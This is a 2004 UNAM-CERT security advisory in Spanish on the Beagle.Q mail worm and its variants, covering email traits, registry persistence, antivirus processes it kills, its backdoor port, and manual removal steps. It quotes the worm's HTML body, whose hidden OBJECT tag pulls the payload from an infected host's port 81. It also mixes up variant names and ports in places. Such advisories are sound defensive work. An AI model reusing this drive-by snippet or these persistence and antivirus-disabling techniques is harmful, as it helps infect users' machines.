Acerca de la SSI Contáctanos Manual para identificar y notificar phishing scam
Computer Emergency Response Team

UNAM-CERT

Equipo de Respuesta a Incidentes de Seguridad Informática

1 2 3 4
Departamento de Seguridad en Computo
  Notas de Seguridad
bolpdf bol
UNAM-CERT nota-2004-004
nota de Seguridad/UNAM-CERT
UNAM-CERT
Departamento de Seguridad en Cómputo
DGSCA-UNAM
nota de Seguridad UNAM-CERT 2004-004
Propagación del Virus W32.Beagle.Q y Variantes

En las últimas horas el CERT/UNAM-CERT ha recibido reportes de nuevo gusano que se propaga de forma masiva a través del correo electrónico. Este gusano conocido como Beagle.Q, explota una vulnerabilidad reciente en el motor de Microsoft Internet Explorer lo cual causa una infección sin la intervención del usuario y sin incluir el ejecutable del virus en el mensaje de correo electrónico.

Fecha de Liberación: 30 de Marzo de 2004
Ultima Revisión: 12 de Agosto de 2004
Fuente:

Sistemas Afectados

  • Microsoft Windows
  • 2000
  • Microsoft Windows
  • XP
  • Microsoft Windows
  • Server 2003
  • Microsoft Windows
  • NT
  • Microsoft Windows
  • 95
  • Microsoft Windows
  • Me
  • Microsoft Windows
  • 98

    Descripción

     

    Beagle.Q conocido también como W32.Bagle.Q [Computer Associates], Bagle.Q [F-Secure], W32/Bagle.q@MM [McAfee], W32/Bagle.Q [Panda], W32/Bagle-Q [Sophos], PE_Bagle.Q [Trend], W32.Beagle.O@mm [Symantec] por los distintos distribuidores antivirus.

    El gusano utiliza su propio motor SMTP para enviarse por sí mismo a las direcciones de correo encontradas en el sistema. El gusano contiene su propia rutina de codificación MIME y creará el correo en memoria.

    El correo tiene las siguientes características:

    • Campo From - Puede ser uno de los siguientes:

      • management@<dominio del destinatario>
      • administration@<dominio del destinatario>
      • staff@<dominio del destinatario>
      • antivirus@<dominio del destinatario>
      • antispam@<dominio del destinatario>
      • noreply@<dominio del destinatario>
      • support@<dominio del destinatario>

    • Campo Subject - Puede ser uno de los siguientes:

      • Account notify
      • E-mail account disabling warning.
      • E-mail account security warning.
      • E-mail technical support message.
      • E-mail technical support warning.
      • E-mail warning
      • Email account utilization warning.
      • Email report
      • Encrypted document
      • Fax Message Received
      • Forum notify
      • Hidden message
      • Important notify
      • Important notify about your e-mail account.
      • Incoming message
      • Notify about using the e-mail account.
      • Notify about your e-mail account utilization.
      • Notify from e-mail technical support.
      • Protected message
      • RE: Protected message
      • RE: Text message
      • Re: Document
      • Re: Hello
      • Re: Hi
      • Re: Incoming Fax
      • Re: Incoming Message
      • Re: Msg reply
      • Re: Thank you!
      • Re: Thanks :)
      • Re: Yahoo!
      • Request response
      • Site changes
      • Warning about your e-mail account

    • Mensaje

      Un correo con el virus Beagle.Q tendrá la siguiente apariencia en el cuerpo del mensaje:
      	<html><body>
      
              <font face="System">
              <OBJECT STYLE="display:none" DATA="http://<IP address>:81/373273.php">
              </OBJECT></body></html>
      	
      Utilizando las aplicaciones de correo electrónico vulnerable como por ejemplo Microsoft Outlook and Microsoft Outlook Express, el virus/gusano es descargado vía HTTP desde la dirección IP del campo DATA del mensaje HTML.

      Cabe señalar que el cuerpo del correo es un mensaje en blanco, pero contendrá código HTML semejante al antes mencionado, y descargará y ejecutará automáticamente el gusano utilizando la Vulnerabilidad en nternet Explorer descrita en el Boletin de Seguridad de Microsoft MS03-032.

      Cumulative Patch for Internet Explorer (822925)
      http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx

      El código intentará descargar el gusano de sistemas infectados (direcciones IP).

      El gusano inicia un servidor Web en el puerto 81 TCP. Actua como servidor cuando recibe un requerimiento GET particular. El gusano envia una página Web .hta conteniendo un script en VBScript el cual descarga el ejecutable y ejecuta un archivo llamado sm.exe. El método toma ventaja de la vulnerabilidad en Internet Explorer anteriormente mencionada.

      Note: Use password <image of password> to open archive.
    • Attached file is protected with the password for security reasons. Password is <image of password>
    • In order to read the attach you have to use the following password: <image of password>
    • Archive password: <image of password>
    • Password - <image of password>
    • Password: <image of password>


    Los "password" es un número aleatorio de 5 dígitos que el gusano utiliza para cifrar el archivo .zip o .rar adjunto.

    El "dominio" es la parte del nombre de dominio de la dirección de correo.


  • Archivo Adjunto - Puede ser uno de los siguientes nombre con extensión .zip, .pif ó .rar.

    • Attach
    • Details
    • Document
    • Encrypted
    • Gift
    • Info
    • Information
    • Message
    • MoreInfo
    • Readme
    • Text
    • TextDocument
    • details
    • first_part
    • pub_document
    • text_document


    Si el archivo adjunto es un archivo .zip o .rar, contendrá un archivo con un nombre aleatorio y con extenesión .exe, el cual es protegido con una contraseña indicada en el correo.

    El ejecutable del gusano tendrá el siguien ícono si es un archivo .exe.



    --> El gusano no enviará mensajes a las direcciones conteniendo cualquiera de las siguientes cadenas:
    • @avp.
    • @foo
    • @hotmail.com
    • @iana
    • @messagelab
    • @microsoft
    • @msn
    • abuse
    • admin
    • anyone@
    • bsd
    • bugs@
    • cafee
    • certific
    • contract@
    • f-secur
    • feste
    • free-av
    • gold-certs@
    • google
    • help@
    • icrosoft
    • info@
    • kasp
    • linux
    • listserv
    • local
    • nobody@
    • noone@
    • noreply
    • ntivi
    • panda
    • pgp
    • postmaster@
    • rating@
    • root@
    • samples
    • sopho
    • spam
    • support
    • unix
    • winrar
    • winzip
    Variantes del Gusano

    La versión W32.Beagle.R (Beagle.S y Beagle.T) busca acceder a los sistemas por el puerto 81, a diferencia de su antecesesor W32.Beagle.Q quien lo hace a través del puerto 2556, además, la versión R intenta acceder o infectar a los equipos mediante la búsqueda por IP’s de manera aleatoria y la versión Q lo hace utilizando una dispersión mediante el envío de correos electrónicos con ciertas características como su anterior versión W32.Beagle.K.

    De igual forma la versión R busca todos los archivos ejecutables en el directorio c:\emails tratándolos de infectar.

    Detalles Técnicos

    1. Cuando se ejecuta Beagle.Q y el año del reloj del sistema es 2006 o posterior, el gusano intentará hacer los siguiente:
      1. Elimina la llave:

        HKEY_CURRENT_USER\SOFTWARE\windirects

      2. Elimina el valor:

        "direct.exe"="%System%\direct.exe"

        de la clave del registro:

        HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

        Si el valor esta presente, para que Beagle.Q no reinicie cuando se inicie Windows.
      3. Detiene su proceso.
    2. Beagle.Q se copia a sí mismo en los siguientes archivos:

      • %System%\directs.exe
      • %System%\directs.exeopen
      • %System%\directs.exeopenopen (Cualquier copia del gusano o un archivo .zip o .rar protedigo con contraseña que contiene el gusano.)
      • %System%\directs.exeopenopenopen (Un archivo .bmp conteniendo una imangen de la contraseña para el archivo .zip o .rar.

        Nota: %System% es una variable. El gusano localiza el directorio de Sistema y se copia por sí mismo a esta localidad. De forma predeterminada, esto es C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), o C:\Windows\System32 (Windows XP).

    3. Agrega el valor:

      "directs.exe"="%System%\directs.exee"

      a la llave del registro:

      HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

      para que Beagle.Q se ejecute cuando inicie Windows.

    4. Agrega la clave:

      HKEY_CURRENT_USER\SOFTWARE\windirects

    5. Finaliza los siguientes procesos, los cuales son responsables de actualizar las firmas de varios programas antivirus:

      • AGENTSVR.EXE
      • ANTI-TROJAN.EXE
      • ANTIVIRUS.EXE
      • ANTS.EXE
      • APIMONITOR.EXE
      • APLICA32.EXE
      • APVXDWIN.EXE
      • ATCON.EXE
      • ATGUARD.EXE
      • ATRO55EN.EXE
      • ATUPDATER.EXE
      • ATWATCH.EXE
      • AUPDATE.EXE
      • AUTODOWN.EXE
      • AUTOTRACE.EXE
      • AUTOUPDATE.EXE
      • AVCONSOL.EXE
      • AVGSERV9.EXE
      • AVLTMAIN.EXE
      • AVPUPD.EXE
      • AVSYNMGR.EXE
      • AVWUPD32.EXE
      • AVXQUAR.EXE
      • AVprotect9x.exe
      • Au.exe
      • BD_PROFESSIONAL.EXE
      • BIDEF.EXE
      • BIDSERVER.EXE
      • BIPCP.EXE
      • BIPCPEVALSETUP.EXE
      • BISP.EXE
      • BLACKD.EXE
      • BLACKICE.EXE
      • BOOTWARN.EXE
      • BORG2.EXE
      • BS120.EXE
      • CDP.EXE
      • CFGWIZ.EXE
      • CFIADMIN.EXE
      • CFIAUDIT.EXE
      • CFINET.EXE
      • CFINET32.EXE
      • CLEAN.EXE
      • CLEANER.EXE
      • CLEANER3.EXE
      • CLEANPC.EXE
      • CMGRDIAN.EXE
      • CMON016.EXE
      • CPD.EXE
      • CPF9X206.EXE
      • CPFNT206.EXE
      • CV.EXE
      • CWNB181.EXE
      • CWNTDWMO.EXE
      • D3dupdate.exe
      • DEFWATCH.EXE
      • DEPUTY.EXE
      • DPF.EXE
      • DPFSETUP.EXE
      • DRWATSON.EXE
      • DRWEBUPW.EXE
      • ENT.EXE
      • ESCANH95.EXE
      • ESCANHNT.EXE
      • ESCANV95.EXE
      • EXANTIVIRUS-CNET.EXE
      • FAST.EXE
      • FIREWALL.EXE
      • FLOWPROTECTOR.EXE
      • FP-WIN_TRIAL.EXE
      • FRW.EXE
      • FSAV.EXE
      • FSAV530STBYB.EXE
      • FSAV530WTBYB.EXE
      • FSAV95.EXE
      • GBMENU.EXE
      • GBPOLL.EXE
      • GUARD.EXE
      • GUARDDOG.EXE
      • HACKTRACERSETUP.EXE
      • HTLOG.EXE
      • HWPE.EXE
      • IAMAPP.EXE
      • IAMSERV.EXE
      • ICLOAD95.EXE
      • ICLOADNT.EXE
      • ICMON.EXE
      • ICSSUPPNT.EXE
      • ICSUPP95.EXE
      • ICSUPPNT.EXE
      • IFW2000.EXE
      • IPARMOR.EXE
      • IRIS.EXE
      • JAMMER.EXE
      • KAVLITE40ENG.EXE
      • KAVPERS40ENG.EXE
      • KERIO-PF-213-EN-WIN.EXE
      • KERIO-WRL-421-EN-WIN.EXE
      • KERIO-WRP-421-EN-WIN.EXE
      • KILLPROCESSSETUP161.EXE
      • LDPRO.EXE
      • LOCALNET.EXE
      • LOCKDOWN.EXE
      • LOCKDOWN2000.EXE
      • LSETUP.EXE
      • LUALL.EXE
      • LUCOMSERVER.EXE
      • LUINIT.EXE
      • MCAGENT.EXE
      • MCUPDATE.EXE
      • MFW2EN.EXE
      • MFWENG3.02D30.EXE
      • MGUI.EXE
      • MINILOG.EXE
      • MOOLIVE.EXE
      • MRFLUX.EXE
      • MSCONFIG.EXE
      • MSINFO32.EXE
      • MSSMMC32.EXE
      • MU0311AD.EXE
      • NAV80TRY.EXE
      • NAVAPW32.EXE
      • NAVDX.EXE
      • NAVSTUB.EXE
      • NAVW32.EXE
      • NC2000.EXE
      • NCINST4.EXE
      • NDD32.EXE
      • NEOMONITOR.EXE
      • NETARMOR.EXE
      • NETINFO.EXE
      • NETMON.EXE
      • NETSCANPRO.EXE
      • NETSPYHUNTER-1.2.EXE
      • NETSTAT.EXE
      • NISSERV.EXE
      • NISUM.EXE
      • NMAIN.EXE
      • NORTON_INTERNET_SECU_3.0_407.EXE
      • NPF40_TW_98_NT_ME_2K.EXE
      • NPFMESSENGER.EXE
      • NPROTECT.EXE
      • NSCHED32.EXE
      • NTVDM.EXE
      • NUPGRADE.EXE
      • NVARCH16.EXE
      • NWINST4.EXE
      • NWTOOL16.EXE
      • OSTRONET.EXE
      • OUTPOST.EXE
      • OUTPOSTINSTALL.EXE
      • OUTPOSTPROINSTALL.EXE
      • PADMIN.EXE
      • PANIXK.EXE
      • PAVPROXY.EXE
      • PCC2002S902.EXE
      • PCC2K_76_1436.EXE
      • PCCIOMON.EXE
      • PCDSETUP.EXE
      • PCFWALLICON.EXE
      • PCIP10117_0.EXE
      • PDSETUP.EXE
      • PERISCOPE.EXE
      • PERSFW.EXE
      • PF2.EXE
      • PFWADMIN.EXE
      • PINGSCAN.EXE
      • PLATIN.EXE
      • POPROXY.EXE
      • POPSCAN.EXE
      • PORTDETECTIVE.EXE
      • PPINUPDT.EXE
      • PPTBC.EXE
      • PPVSTOP.EXE
      • PROCEXPLORERV1.0.EXE
      • PROPORT.EXE
      • PROTECTX.EXE
      • PSPF.EXE
      • PURGE.EXE
      • PVIEW95.EXE
      • QCONSOLE.EXE
      • QSERVER.EXE
      • RAV8WIN32ENG.EXE
      • REGEDIT.EXE
      • REGEDT32.EXE
      • RESCUE.EXE
      • RESCUE32.EXE
      • RRGUARD.EXE
      • RSHELL.EXE
      • RTVSCN95.EXE
      • RULAUNCH.EXE
      • SAFEWEB.EXE
      • SBSERV.EXE
      • SD.EXE
      • SETUPVAMEEVAL.EXE
      • SETUP_FLOWPROTECTOR_US.EXE
      • SFC.EXE
      • SGSSFW32.EXE
      • SH.EXE
      • SHELLSPYINSTALL.EXE
      • SHN.EXE
      • SMC.EXE
      • SOFI.EXE
      • SPF.EXE
      • SPHINX.EXE
      • SPYXX.EXE
      • SS3EDIT.EXE
      • ST2.EXE
      • SUPFTRL.EXE
      • SUPPORTER5.EXE
      • SYMPROXYSVC.EXE
      • SYSEDIT.EXE
      • TASKMON.EXE
      • TAUMON.EXE
      • TAUSCAN.EXE
      • TC.EXE
      • TCA.EXE
      • TCM.EXE
      • TDS-3.EXE
      • TDS2-98.EXE
      • TDS2-NT.EXE
      • TFAK5.EXE
      • TGBOB.EXE
      • TITANIN.EXE
      • TITANINXP.EXE
      • TRACERT.EXE
      • TRJSCAN.EXE
      • TRJSETUP.EXE
      • TROJANTRAP3.EXE
      • UNDOBOOT.EXE
      • UPDATE.EXE
      • VBCMSERV.EXE
      • VBCONS.EXE
      • VBUST.EXE
      • VBWIN9X.EXE
      • VBWINNTW.EXE
      • VCSETUP.EXE
      • VFSETUP.EXE
      • VIRUSMDPERSONALFIREWALL.EXE
      • VNLAN300.EXE
      • VNPC3000.EXE
      • VPC42.EXE
      • VPFW30S.EXE
      • VPTRAY.EXE
      • VSCENU6.02D30.EXE
      • VSECOMR.EXE
      • VSHWIN32.EXE
      • VSISETUP.EXE
      • VSMAIN.EXE
      • VSMON.EXE
      • VSSTAT.EXE
      • VSWIN9XE.EXE
      • VSWINNTSE.EXE
      • VSWINPERSE.EXE
      • W32DSM89.EXE
      • W9X.EXE
      • WATCHDOG.EXE
      • WEBSCANX.EXE
      • WGFE95.EXE
      • WHOSWATCHINGME.EXE
      • WINRECON.EXE
      • WNT.EXE
      • WRADMIN.EXE
      • WRCTRL.EXE
      • WSBGATE.EXE
      • WYVERNWORKSFIREWALL.EXE
      • XPF202EN.EXE
      • ZAPRO.EXE
      • ZAPSETUP3001.EXE
      • ZATUTOR.EXE
      • ZAUINST.EXE
      • ZONALM2601.EXE
      • ZONEALARM.EXE

    6. Borra los siguientes valores

      • 9XHtProtect
      • Antivirus
      • HtProtect
      • ICQ Net
      • ICQNet
      • My AV
      • NetDy
      • Special Firewall Service
      • Tiny AV
      • Zone Labs Client Ex
      • service


      De las claves del registro:

      • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
      • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


    7. Abre una puerta trasera en el puerto 2556 TCP.

      Si un intruso envía un mensaje de datos formateado especialmente al puerto, el gusano permitirá que un archivo arbitrario sea descargado en el directorio %windir%. Este archivo será guardado como %Windir%\iuplda<x>.exe, donde <x> es una cadena aleatoria de caracteres.

    8. Intenta propagarse a través de redes de compartición de archivos, como Kazaa e iMesh, W32.Beagle.K se copia a sí mismo a los directorios que contienen la cadena "shar" en sus nombres. El gusano utiliza los nombres de archivos de la siguiente lista:
      • ACDSee 9.exe
      • Adobe Photoshop 9 full.exe
      • Ahead Nero 7.exe
      • Matrix 3 Revolution English Subtitles.exe
      • Microsoft Office 2003 Crack, Working!.exe
      • Microsoft Office XP working Crack, Keygen.exe
      • Microsoft Windows XP, WinXP Crack, working Keygen.exe
      • Opera 8 New!.exe
      • Porno Screensaver.scr
      • Porno pics arhive, xxx.exe
      • Porno, sex, oral, anal cool, awesome!!.exe
      • Serials.txt.exe
      • WinAmp 5 Pro Keygen Crack Update.exe
      • WinAmp 6 New!.exe
      • Windown Longhorn Beta Leak.exe
      • Windows Sourcecode update.doc.exe
      • XXX hardcore images.exe

    9. Busca en las unidades locales e intenta infectar archivos .exe. La rutina de infección es polimórfica e agrega el gusano al archivo.

    10. Escanea los archivos en las unidades locales con las siguientes extensiones:
      • .adb
      • .asp
      • .cfg
      • .cgi
      • .dbx
      • .dhtm
      • .eml
      • .htm
      • .jsp
      • .mbx
      • .mdx
      • .mht
      • .mmf
      • .msg
      • .nch
      • .ods
      • .oft
      • .php
      • .pl
      • .sht
      • .shtm
      • .stm
      • .tbb
      • .txt
      • .uin
      • .wab
      • .wsh
      • .xls
      • .xml

        y colecciona cualquier dirección de correo electrónico que encuentra.

  • Soluciones
    • Aplicar una Actualización del Distribuidor

      Se recomienda instalar la actualización de seguridad que soluciona la vulnerabilidad que explota este gusano.

      Microsoft Security Bulletin MS03-032
      Cumulative Patch for Internet Explorer (822925)

      http://www.microsoft.com/technet/security/bulletin/MS03-032.mspx

      Pero es recomendable aplicar la última actualización acumulativa para Internet Explorer liberada el 2 de Febrero de 2004:

      Microsoft Security Bulletin MS04-004
      Cumulative Security Update for Internet Explorer (832894)

      http://www.microsoft.com/technet/security/bulletin/MS04-004.mspx


    • Ejecutar, administrar y actualizar un software antivirus

      Aunque un paquete de software antivirus actualizado no puede brindar protección contra todos los códigos maliciosos, para la mayoría de los usuarios representa la primera línea de defensa contra ataques de código malicioso.

      La mayoría de los distribuidores antivirus liberan frecuentemente información actualizada, herramientas, o bases de datos de virus para ayudar a detectar y recuperar un sistema que ha sido infectado mediante un código malicioso, incluyendo Beagle.K. De esta forma, es importante que los usuarios mantengan su software antivirus actualizado.

      Mucho software antivirus se apoya en las actualizaciones automáticas de las definiciones de virus. El CERT/UNAM-CERT recomienda utilizar estas actualizaciones automáticas cuando estén disponibles.

    • No ejecutar programas de origen desconocido

      Nunca descargue, instale o ejecute un programa a menos que sepa que es autorizado por una persona o compañía en la que se confía. Los usuarios de correo electrónico deben estar concientes de archivos adjuntos inesperados, mientras que los usuarios de Internet Relay Chat (IRC), de la mensajería instantánea (IM), y de servicios de compartición de archivos deben ser muy cuidadosos al dar clic en vínculos o links desconocidos o al ejecutar software enviado por otros usuarios debido a que son los métodos más utilizados entre los intrusos para intentar crear redes de agentes DDoS.

    • Eliminación Manual

      • Deshabilitar System Restore (Windows Me/XP).

        • Windows Me
          1. Haga clic en Inicio, seleccione Configuración y, a continuación, haga clic en Panel de control.
          2. Haga doble clic en Sistema. Se abrirá la ventana de Propiedades del sistema.
            Nota: Si no es visible el ícono de Sistema haga clic en "Ver todas las opciones de Panel de control".
          3. Haga clic en la pestaña Rendimiento y haga clic en el botón "Archivos de sistema". La ventana de Archivos de sistema se abrirá.
          4. Haga clic en Sistema de archivos y, a continuación, haga clic en la pestaña Solución de problemas.
          5. Marque la casílla de la opción Deshabilitar Restaurar sistema.
          6. Haga clic en Aceptar y, por último, en Cerrar. Haga clic en Sí cuando se le pregunte si desea reiniciar Windows.

        • Windows XP
          1. Haga clic en Inicio.
          2. Haga clic con el botón secundario en el icono Mi PC y, a continuación, haga clic en Propiedades.
          3. Haga clic en la pestaña Restaurar sistema.
          4. Marque la casílla Desactivar Restaurar sistema o la casílla Desactivar Restaurar sistema en todas las unidades.
          5. Haga clic en Aplicar y a continuación, en Aceptar.
          6. Como verá en el mensaje, esta acción eliminará todos los puntos de restauración existentes. Haga clic en Sí para llevar a cabo esta acción.
          7. Haga clic en Aceptar y reinice el sistema.


      • Actualizar las definiciones de Antivirus.

        Independientemente del software antivirus que este utilizando, actualice su base de datos de firmas antivirus para poder eliminar el virus Beagle.K.

      • Eliminar los valores que fueron agregados al registro y reiniciar el equipo.

        1. Dar clic en Inicio y después en Ejecuta.
        2. Escribir regedit y presionar Aceptar.
        3. Buscar la siguiente llave:
          HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        4. En el panel de la derecha eliminar el siguiente valor:
          "directs.exe"="%System%\directs.exe"
        5. Salir del editor del registro.
        6. Localizar y eliminar los archivos ejecutables directs.exe, directs.exeopen, directs.exeopenopen o directs.exeopenopenopen del directorio (en el caso de que existan):

          • C:\Windows\System (Win 95/98/ME)
          • C:\Winnt\System32 (Win NT/2000)
          • C:\Windows\System32 (Win XP)

        7. Reiniciar el equipo.


      • Analizar el sistema mediante el software antivirus actualizado para eliminar los archivos infectados.




    Apendices

     

    Apéndice A. Referencias


    UNAM-CERT
    Equipo de Respuesta a Incidentes UNAM
    Departamento de Seguridad en Computo
    E-Mail : seguridad@seguridad.unam.mx
    http://www.unam-cert.unam.mx
    http://www.seguridad.unam.mx
    ftp://ftp.seguridad.unam.mx
    Tel : 56 22 81 69
    Fax : 56 22 80 43

    Login:

    Password:





      Acerca pacerca
     
      Contactanos pcontacto
     
      Staff pstaff
     
      FTP pftp
     

    Universidad Nacional Autonoma de M.xico 100 aqos UNAM Direccisn General de Servicios de Csmputo Acad.imico EQA ISO 27001 Aviso legal | Criditos
    Copyright © Todos los derechos reservados
    UNAM - CERT / DGSCA